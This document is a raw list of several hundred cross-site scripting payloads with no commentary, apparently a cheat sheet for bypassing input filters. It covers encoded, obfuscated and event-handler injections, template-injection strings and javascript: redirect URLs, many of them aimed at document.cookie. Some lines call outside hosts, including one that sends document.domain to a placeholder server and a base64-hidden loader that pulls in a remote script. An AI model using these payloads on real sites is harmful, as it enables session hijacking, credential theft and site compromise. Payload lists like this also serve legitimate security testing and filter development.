"><xss/contenteditable/autofocus/onfocus="alert(1)">%232%20XSS</xss>
<img/src/onerror=alert&#xFEFF;(1337)>
<img/src/onerror=&#8196;alert&#65279;(31337)>
<svg on onload=(alert)(document.domain)>
<img ignored=() src=x onerror=prompt(1)>
<svg onx=() onload=(confirm)(document.cookie)>
<Rxss onscrollend=alert(origin) style="display:block;overflow:auto;border:1px dashed;width:500px;height:100px;"><br>++</Rxss>
“><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
"onx+%00+onpointerenter%3dalert(domain)+x"
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
<svg/onload=location/**/='https://your.server/'+document.domain>
<img/src=x onError="`${x}`;alert(`Ex.Mi`);">
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='test'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />tap
%3C%5K/onpointerenter=alert(1)>
<P/onpointerenter=alert(1)>
'-[document.domain].map(alert)-'
<meter onmouseover="alert(1)"
'">><div><meter onmouseover="alert(1)"</div>"
[][“\146\151\154\164\145\162”][“\143\157\156\163\164\162\165\143\164\157\162”](“\145\166\141\154\50\141\164\157\142\50\42\131\127\170\154\143\156\121\157\115\123\153\75\42\51\51”)()
[]["filter"]["constructor"]("alert(1)")()
/%09/javascript:alert(1)
<!--*/!'*/!>%0D<svg/onload=confirm'1'//
1"><%3Csvg onload=alert%28document.cookie%29>'
/";%20confirm(1);%20//
%22%3e%3c%5K/onwheel=alert(1)%3emouse%20wheel%20here%3c%21--
%22})))}catch(e){alert(document.domain);}//
%22-confirm(1)-%22
//%250Aalert?.(1)//
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2fscript%3E
%3cscript%3ealert()%3c/script>
-alert(23)/
";a=prompt,a(1)//
"]);}catch(e){}if(!self.a)self.a=!alert(document.domain);//
'-confirm(document.cookie)-'
data:text/html,<script>alert(0)</script>
foo<script>alert(document.cookie)</script>
#<iframe src=javascript:alert(1)>
"><img src=x onerror=alert(1);>
<--'<Script>Window.Confirm(2)</Script> --!>
&#x3c;img&#x2f;src&#x2f;onerror=alert('kalendra')&#x3e;
javascript&#58;alert(1);
javascript&colon;alert(1);
/"><img src=y onerror=confirm(1)>
""><img src=y onerror=confirm(1)>
#""><img src=y onerror=confirm(1)>
<input onfocus="alert(0);" autofocus>
&lt;img src=# onerror=alert(1)&gt;
">><marquee><img src=x onerror=confirm(1)></marquee>"
onerror=alert(0);>
onerror=alert();><script>alert();</script>
&redirect?url=javascript://alert(document.cookie)
?url=javscript:alert(1)
&redirect_url=javscript:alert(1)
&redirect_to=javascript:alert(document.domain)
%2500%27onmouseover=%27window.stop();alert(document.domain)%27
?path=%2500%27onmouseover=%27window.stop();alert(document.domain)%27
<ScRiPt>alert(1)</sCriPt>
<svg/onload=alert(1)>"@gmail.com
?__proto__[transport_url]=%3C%2fscript%3E%3Cscript%3Ealert(document.cookie)%3C%2fscript%3Eivl0w
\u003e\u003cimg src=1 onerror=alert(0)\u003e
"/><svg/onload=prompt(1)>
test%22%7D%29%3B%7D%29%3Balert%281%29%3B%2f%2f
test123";(alert)("xss")//
<x onmouseup=alert(1)>click this!
{alert('document.cookie')}
jane('"><script>alert(2)</script>)@gmail.com
<!--><svg onload=alert(1)-->
#<!--><svg onload=alert(1)-->
alert`1`
#alert`1`
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'>
`${alert(1)}`
"oncut=alert(1)
"><img+src=x+onerror=alert(1)>
<scr\uffffipt>alert(0)</script>
&lt;img src=x onerror=alert(document.domain)&gt;
1337 '><marquee onstart="[cookie].find(confirm)">
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
\><plaintext/onmouseover=prompt(1)
a=`\u003c`,b=`\u003e`,location=`javascript:[].findIndex(dump)+(/${a}img src=# onerror=alert(1)${b}/.source)`
'-confirm(1)-
#'-confirm(1)-
"-confirm(1)-"
'-confirm(document.domain)-'
%22%3E%3Cimg%20src=x%20onerror=confirm%281%29;%3E
');confirm(1);//
<script>alert&DiacriticalGrave;1&DiacriticalGrave;</script>
<script>\u0061\u006C\u0065\u0072\u0074(1)</script>
<iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe>
<script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>"
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
<script src="data:,alert(1)">/</script>
<svg/onrandom=random onload=confirm(1)>
<video onnull=null onmouseover=confirm(1)>
x"><svg%250donload%3D"window%5B%27alert%27%5D(location[%27hostname%27])"
" formaction=java%26Tab%3bscript:ale%26Tab%3brt() type=image src=""
setInterval`alert\x2823\x29`
<a href="data:text/html;charset=utf-7;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=">Click Here</a> { Data URI XSS: data:text/html;charset=utf-7;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4= (PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=) : <script>alert('XSS')</script> }
window.name='javascript:alert\x2823\x29';
Reflect.set.call`${location}${'href'}${name}`
Reflect.apply.call`${alert}${undefined}${[23]}`
navigation.navigate`javascript:alert\x2823\x29`
var{haha:onerror=alert}=0;throw 1
'alert\x2823\x29'instanceof{[Symbol.hasInstance]:eval}
onerror=eval;throw'=alert\x2823\x29';
{onerror=alert}throw 23
throw{},onerror??=alert,"XSS"??123
http://example.com/?%0aalert(23)
window.name='javascript:alert(23)';
throw onerror=eval,SyntaxError`alert\x2823\x29`
x='javascript:alert\x2823\x29';x={x:location}=this
window.name="<img src=x onerror=alert(23)>"
<JavaScript:"\74Svg\57OnLoad\75\141\154\145\162\164\501\51\76"/ContentEditable/AutoFocus/OnFocus=location=tagName>
document.body.innerHTML="\u003cimg src=x onerror=alert\u002823\u0029\u003e";
document.body.innerHTML="&ltimg src=x onerror=alert&lpar;23&rpar;&gt"
document.body.innerHTML=document.body.innerText
document.location='javascript:alert%2823%29'
<svg/onload='alert&#40 23 &#41'>
onerror=eval;throw'alert\x2845\x29';
prompt`45`
([,하,,,,훌]=[]+{},[한,글,페,이,,로,드,ㅋ,,,ㅎ]=[!!하]+!하+하.ㅁ)[훌+=하+ㅎ+ㅋ+한+글+페+훌+한+하+글][훌](로+드+이+글+한+'(45)')()
[45].some.alert()
Set.constructor`alert\x2845\x29`
+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
" onload="document.cookie" foobar="
location='javaScriPt:alert\x2845\x29'
'javaScriPt:alert\x2845\x29'
location=/javascript:alert%2823%29/.source;
&lt;img/src=&quot;x&quot;/onerror=alert(23)&gt;
location='JaVaScRiPt:prompt'+document.location.hash[1]+'45'+document.location.hash[2]
'JaVaScRiPt:prompt'+document.location.hash[1]+'45'+document.location.hash[2]
window.name="alert(23)";
'1/-alert\5023\51/';
throw/**/Uncaught=window.onerror=eval,&quot;;alert\5023\51&quot;
<a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *>
?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e
%3Csvg%20onload=alert(1)%3E
%3Cimg%20src=x%20onerror=alert(1)%3E
%22%3C!--%3E%3CSvg%20OnLoad=confirm?.(/Yetixx%F0%9F%98%88/)%3C!--1%22%29%22%3C%21--%3E%3CSvg+OnLoad%3Dconfirm%3f%2e%28%2fYetixx%2f%29%3C%21--
[].sort.call`${alert}23`
throw onerror=eval,SyntaxError`alert\x2823\x29`
<object src=1 href=1 onerror="javascript:alert(1)"></object>
<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove>
"`'><script>\xE2\x80\xAFjavascript:alert(1)</script>
`"'><img src=xxx:x onerror\x0C=javascript:alert(1)>
%22%3E%3Cli%20style=list-style:url()%20onerror=javascript:alert(1)%3E%20%3Cdiv%20sty
&ltscr\x00ipt&gtalert('Steiner254')&lt/scr\x00ipt&gt
&ltScRiPt&gtalert('Steiner254');&lt/ScRiPt&gt
<iframe/onload=alert(0);>
#<iframe/onload=alert(0);>
setTimeout('ale'+'rt(2)');
top['alert'](3)
'te' / alert('/') / 'xt';
></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)>
'-alert(0)-'
',document.location='javascript:document.domain','
blalala');alert(1);('a
#blalala');alert(1);('a
eval(atob(Y29uZmlybShkb2N1bWVudC5kb21haW4pOw==))”> <iframe
"><script>alert(“hello”)</script>jnyf0
<IMG SRC=javascript:alert('XSS')>
<img/src/onerror=alert(1)
<div onpointerenter="alert(45)">MOVE HERE</div>
<body ontouchmove=alert(1)>
<body ontouchend=alert(1)>
<IMG SRC=1 ONERROR=&#X61;&#X6C;&#X65;&#X72;&#X74;(1)>
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
java%09script:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript://%0Aalert(1)
javascript://anything%0D%0A%0D%0Awindow.alert(1)
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);">
<iframe srcdoc="<img src=x onerror=alert(998282828181100019)>"></iframe> /path?next=javascript:top[/al/.source+/ert/.source](document.cookie) login?redirectUrl=javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain
<<SCRIPT>alert("test");//<</SCRIPT>
<SCRIPT SRC=https://xss.rocks/xss.js?< B >
<BODY ONLOAD=alert('XSS')>
<TABLE BACKGROUND="javascript:alert('XSS')">
444-555-4455 <img src=x onerror=alert(1)>
<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>
<img/src="x"/onerror="[boom]">
%3cscript%3ealert(1)%3c/script>
"}]}';</script><script>alert('You got XSSed')</script>
</script><script>alert('You got XSSed')</script>
#</script><script>alert('You got XSSed')</script>
"}]}';alert('You got XSSed')</script>
test“autofocus onclick=&#97;lert()
<img src="data:image/svg+xml,<svg onload='top[//.source+//ert//.source](document.cookie)'">
<iframe srcdoc="<script>top[//.source+//ert//.source](document.cookie)</script>"></iframe>
<a href="/*">*/)});function+__MobileAppList(){alert(1)}//>
"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
"*alert(1)*"
xss\"\u003E\u003Ch1 onmous\u0045leave=co\u006efirm(domain)\u003ECome to Me\u003C/h1\u003E\u003Cbr\u003E\u003C!--
<s<script>cript>alert()</s<script>cript>
alert`23`
window.name="javascript:alert(23)";
eval.call`${'alert\x2823\x29'}`
eval.apply`${[`alert\x2823\x29`]}`
setTimeout`alert\x2823\x29`
onerror=alert;throw 23;
param A=<script>alert("
#*/confirm(1)
javascript:%61lert(1)
“`><script>\x0Djavascript:alert(document.cookie)</script>
x"><x a="><script>alert(1)</script>
<a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'>
(A(%22onerror=%22alert%601%60%22))
<fieldset//%00//onsite OnMoUsEoVeR=\u0061\u006C\u0065\u0072\u0074/AAAA/>
onfocus=alert&#x00000000028;1&#x00000000029; autofocus>
'><img+sRc=l+oNerrOr=prompt(document.cookie)+x>
“ OnMouseOver=”prompt`1`
"oncut="alert()
xss\"\u003E\u003Ch1 onmous\u0045leave=co\u006efirm(domain)\u003ECome to Me\u003C/h1\u003E\u003Cbr\u003E\u003C!--
<script>window['al'+'ert']()</script>
<script>top[`alert`]()</script>
<img src=x onerror="js:abc='al'+'ert()';eval(abc)" />
<script>window[['conf','irm'].toString().replaceAll(',',"")]()</script>
%26#x6c;t;\\x73cript&#62;\\u0061lert(1)%26#x6c;t;/\\x73cript&#62;
onfocus=alert(1)
%2527%2520onfocus%253D%2527alert%25281%2529%2527%2520
onfocus=alert(1) autofocus=
<img%20src=x%20onerror=”%26%2397%26%23108%26%23101%26%23114%26%23116(1)”>
"><div class=progress><div onwebkitanimationstart=prompt(document.domain)>
/on<script>load=prompt(document.cookie);>
quot;">"onmousemove=alert('flag{THIS_IS_THE_FLAG}');"@evil.com</a>
javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
“javascript:var{a:onerror}={a:alert};throw%20document.cookie”
?msg=<img/src=`%00`%20onerror=this.onerror=confirm(1)
<img/src=`%00`%20onerror=this.onerror=confirm(1)
<svg><script%20?>confirm(1)
qwe"srcdoc="\u003ce<script%26Tab;src=//dom.xss>\u003ce</script%26Tab;e>
';window/*aabb*/['al'%2b'ert'](document./*aabb*/location);//
<img src=x onerror="a='',b=!a+a,aa=!b+a,ab=a+{},ba=b[a++],bb=b[baa=a],bab=++baa+a,aaa=ab[baa+bab],b[aaa+=ab[a]+(b.aa+ab)[a]+aa[bab]+ba+bb+b[baa]+aaa+ba+ab[a]+bb][aaa](aa[a]+aa[baa]+b[bab]+bb+ba+'(a)')()">
anything&callback=%22;alert%60XSS_POC_BY_SAAJAN_BHUJEL%60;%2f%2f
anything&callback=";alert`XSS_POC_BY_SAAJAN_BHUJEL`;//
<%<script>alert(1)</script>
" onload=alert&#0000000040origin) value="
javascript%3Avar%7Ba%3Aonerror%7D%3D%7Ba%3Aalert%7D%3Bthrow%2520document.cookie
"><img src="x" onerror=alert(1337) />
<script>alert()</script>”/></style>
%22onmouseover=window[%27al%27%2B%27er%27%2B([%27t%27,%27b%27,%27c%27][0])](document[%27cooki%27%2B(['e','c','z'][0])]);%22
alert(document.domain)
/*alert(1)*/
alert(1)
\”}})})-confirm`1`;(function(){({if(){/*///
\”}})})-confirm`1`(a=>{({b:{/*///
<base href="javascript:alert('XSS');">
<bgsound src="javascript:alert('XSS');">
<isindex action="javascript:alert('XSS')">
<command onclick="alert('XSS')">Command</command>
<fieldset form="javascript:alert('XSS')">
<frameset onload="alert('XSS')"></frameset>
<applet code="javascript:alert('XSS')"></applet>
<button formaction="javascript:alert('XSS')">Click me</button>
<div oncopy="alert('XSS')">Copy me</div>
<form onsubmit="alert('XSS')">
<select onchange="alert('XSS')"><option>Option</option></select>
<input type="image" src="invalid" onerror="alert('XSS')">
<div style="border-image-source: url(javascript:alert('XSS'));">
<datalist id="xss"><option value="&lt;script&gt;alert('XSS')&lt;/script&gt;"></datalist>
<meter value=" " min=" " max=" " low=" " high=" " onmouseover="alert('XSS')"></meter>
<optgroup label="XSS" onmouseenter="alert('XSS')"></optgroup>
<progress onmouseover="alert('XSS')"></progress>
<track oncuechange="alert('XSS')"></track>
<link rel="stylesheet" href="data:text/css,*{background:url('javascript:alert(XSS)')}">
<div style="list-style-image: url(javascript:alert('XSS'));">
<div data-url="javascript:alert('XSS')"></div>
<div style="content: url(javascript:alert('XSS'));">
<style>*{background-image: url(javascript:alert('XSS'))}</style>
<div style="cursor: url(javascript:alert('XSS')), auto;">
<meta http-equiv="refresh" content=" ; url=javascript:alert('XSS');">
<input type="button" value="XSS" onclick="alert('XSS')">
<svg><animate attributeName="xlink:href" to="javascript:alert('XSS')" /></svg>
<math href="javascript:alert('XSS')" />
<xss style="x:expression(alert('XSS'))">
<form action="javascript:alert('XSS')"><input type="submit" value="XSS"></form>
<div style="width:expression(alert('XSS'))">
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
"<zzz><style>@keyframes+x+{}</style><xss+style="animation-Name:+x"+onwebkitanimationstart="print()"></xss>
<script>eval('\x61lert(\'33\')')</script>
<script>\u0061lert('22')</script>
<marquee onstart="alert('XSS')">Start</marquee>
<style>@import 'javascript:alert(XSS)';</style>
<link rel="import" href="data:text/html,<script>alert('XSS')</script>">
<div onkeyup="alert('XSS')">Press a key</div>
<input onblur="alert('XSS')" value="Blur me">
%3Cscript%3E%60alert%60%28%2FXSS%2F%29%3B%3C%2Fscript%3E
%3Cimg%20src%3Dx%20onerror%3D%60alert%28%2FXSS%2F%29%60%3E
%3Csvg%20onload%3D%60alert%28%2FXSS%2F%29%60%3E%3C%2Fsvg%3E
%3Ciframe%20srcdoc%3D%60%3Cscript%3Ealert%28%2FXSS%2F%29%3B%3C%2Fscript%3E%60%3E%3C%2Fiframe%3E
%3Cinput%20type%3D%22text%22%20value%3D%22%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E%22%3E
%3Cbody%20onload%3D%60alert%28%2FXSS%2F%29%60%3E%3C%2Fbody%3E
%3Cdiv%20style%3D%22width%3A%20expression%28alert%28%2FXSS%2F%29%29%3B%22%3E%3C%2Fdiv%3E
%3Cbutton%20onclick%3D%60alert%28%2FXSS%2F%29%60%3EClick%20me%3C%2Fbutton%3E
%3Cform%20action%3D%22javascript%3Aalert%28%2FXSS%2F%29%22%3E%3Cinput%20type%3Dsubmit%3E%3C%2Fform%3E
%3Cmeta%20http-equiv%3D%22refresh%22%20content%3D%220%3Burl%3Djavascript%3Aalert%28%2FXSS%2F%29%22%3E
%3Csvg%20onload%3D%60alert%28%60XSS%60%29%60%3E
%3Cimg%20src%3Dx%20onerror%3D%60alert%28%60XSS%60%29%60%3E
%3Cbody%20onload%3D%60alert%28%60XSS%60%29%60%3E
%3Ciframe%20src%3D%60javascript%3Aalert%28%60XSS%60%29%60%3E%3C%2Fiframe%3E
%3Cinput%20onfocus%3D%60alert%28%60XSS%60%29%60%3E
%3Cbutton%20onclick%3D%60alert%28%60XSS%60%29%60%3EClick%3C%2Fbutton%3E
%3Cform%20action%3D%60javascript%3Aalert%28%60XSS%60%29%60%3E%3Cinput%20type%3Dsubmit%3E%3C%2Fform%3E
%3Cobject%20data%3D%60javascript%3Aalert%28%60XSS%60%29%60%3E%3C%2Fobject%3E
%3Cembed%20src%3D%60javascript%3Aalert%28%60XSS%60%29%60%3E
%3Ciframe%20srcdoc%3D%60%3Cscript%3Ealert%28%60XSS%60%29%3C%2Fscript%3E%60%3E%3C%2Fiframe%3E
console.log(document.domain)
<img src="" onerror="alert(document.cookie)">
<img src="abc" onerror="alert(1)">
=a=document.domain;top["al"%2b"ert"](/%2a%2a/a)>
a=document.domain;top["al"%2b"ert"](/%2a%2a/a)>
xss=*/prompt("XSS")/*&
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>
%09Jav%09ascript:alert(document.domain)
javascript://%250Alert(document.location=document.cookie)
/%09/javascript:alert(1);
javascript:confirm(1)
<math><style><img src onerror=alert(2)></style></math>
<img/src/onerror=alert/*1337*/(1)>
<script>alert(/Chrome%20XSS%20filter%20bypass/);</script>
javascript:document.getElementsByTagName(%60body%60)%5B0%5D.innerHTML=%60%3Ch1%3Ehacked%3C/h1%3E%60//
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veTEueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw&#61;&#61; onerror=eval(atob(this.id))>"><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veTEueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw&#61;&#61;>
”><svg onload=alert&#0000000040"1")>
"><svg onload=alert&#x00000040"1")>
"><svg onload=alert&amp;amp;#x00000040"1")>
"><svg onload=alert&amp;gt;#x00000040"1")>
"><svg onload=alert&quot;#x00000040"1")>
"><svg onload=alert&amp;#x27;#x00000040"1")>
"><svg onload=alert&#x2F;#x00000040"1")>
"><svg onload=alert&amp;amp;#x27;#x00000040"1")>
"><svg onload=alert&amp;#x2F;#x00000040"1")>
"><svg onload=alert&amp;#x2F;#x00000040"1")>
"><img%20src=x%20onerror="alert(%27POC%20By%20DrakenKun%27)"
asdf"onload%3d"alert('Slax Was Here!')"asdf
{{$emit.constructor`alert(1)`()}}
<x @click=_withCtx.constructor`alert(1)`()>click</x>
<a href=”javas cript:alert(document.cookie)” >Testing.com </a>
"><img src="x" >
page=1"><Svg Only=1 OnLoad=confirm(document.domain)>
' onfocus='alert(1)'
"><Svg Only=1 OnLoad=confirm(document.domain)>
"%2F><%2Fscript><script>alert%28document.cookie%29<%2Fscript>
%2527%2520onmouseover%253D%2527alert%25281%2529%2527%2520
<svg+onload%3dprompt%26%230000000040document.domain)>
{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)//');}}
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
<A HREF="htt p://6 6.000146.0x7.147/">XSS</A>
<iframe src="&Tab;javascript:prompt(1)&Tab;">
<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
<sVg><scRipt >alert&lpar;1&rpar; {Opera}
<img/src=`` onerror=this.onerror=confirm(1)
<form><isindex formaction="javascript&colon;confirm(1)"
<img src=``&NewLine; onerror=alert(1)&NewLine;
<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<script /**/>/**/alert(1)/**/</script /**/
&#34;&#62;<h1/onmouseover='\u0061lert(1)'>
<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
<form><a href="javascript:\u0061lert&#x28;1&#x29;">X
</script><img/*/src="worksinchrome&colon;prompt&#x28;1&#x29;"/*/onerror='eval(src)'>
<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a
http://www.google<script .com>alert(document.location)</script
<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
<img/src=@&#32;&#13; onerror = prompt('&#49;')
<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
<script ^__^>alert(String.fromCharCode(49))</script ^__^
</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(
&#00;</form><input type&#61;"date" onfocus="alert(1)">
<form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>
<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
<script ~~~>alert(0%0)</script ~~~>
<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
<div/style="width:expression(confirm(1))">X</div> {IE7}
<iframe// src=javaSCRIPT&colon;alert(1)
//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>
<a/href="javascript:&#13; javascript:prompt(1)"><input type="X">
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}
<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
<div onmouseover='alert&lpar;1&rpar;'>DIV</div>
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<var onmouseover="prompt(1)">On Mouse Over</var>
<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
<%<!--'%><script>alert(1);</script -->
<input value=<><iframe/src=javascript:confirm(1)
http://www.<script>alert(1)</script .com
<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
<svg><script ?>alert(1)
<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
<img src=`xx:xx`onerror=alert(1)>
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
<math><a xlink:href="//jsfiddle.net/t846h/">click
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
<svg contentScriptType=text/vbs><script>MsgBox+1
<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script
<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
<script>+-+-1-+-+alert(1)</script>
<script itworksinallbrowsers>/*<script* */alert(1)</script
<img src ?itworksonchrome?\/onerror = alert(1)
<svg><script>//&NewLine;confirm(1);</script </svg>
<svg><script onlypossibleinopera:-)> alert(1)
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
<div/onmouseover='alert(1)'> style="x:">
<--`<img/src=` onerror=alert(1)> --!>
<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
"><img src=x onerror=window.open('https://www.google.com/');>
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
